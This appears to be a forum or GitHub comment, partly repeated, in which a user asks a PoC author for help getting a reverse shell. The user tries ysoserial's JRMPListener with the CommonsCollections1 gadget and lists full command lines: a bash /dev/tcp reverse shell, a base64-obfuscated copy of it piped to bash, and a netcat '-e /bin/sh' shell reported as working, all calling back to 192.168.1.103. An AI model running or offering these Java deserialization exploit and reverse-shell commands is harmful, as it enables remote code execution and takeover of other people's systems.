Very nice and easy PoC shared with the community, thanks a lot for this :) I was wondering if you could help me for the good syntax in order to obtain the reverse shell, i can exec simple commands no problem, but when I try to get reverse shell with the JRMP Listener, it seems like my syntax isn't going through...
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 'nc 192.168.1.103 1087 -e /bin/sh' == OK, but this isn't the right way to do it since not all might have "nc" installed
Hi @pyn3rd !
Very nice and easy PoC shared with the community, thanks a lot for this :) I was wondering if you could help me for the good syntax in order to obtain the reverse shell, i can exec simple commands no problem, but when I try to get reverse shell with the JRMP Listener, it seems like my syntax isn't going through...
Here's what I've tried so far:
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 "'/bin/bash -i > /dev/tcp/192.168.1.103/1087 0>&1 2>&1" = FAILED
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 "bash -c 'echo L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC4xLjEwMy8xMDg3IDA+JjEgMj4mMQ==|base64 -d|bash -i'" = FAILED
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 "echo L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC4xLjEwMy8xMDg3IDA+JjEgMj4mMQ==|base64 -d|bash -i" = FAILED
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 'nc 192.168.1.103 1087 -e /bin/sh' == OK, but this isn't the right way to do it since not all might have "nc" installed
Your help would be very appreciated,
Thanks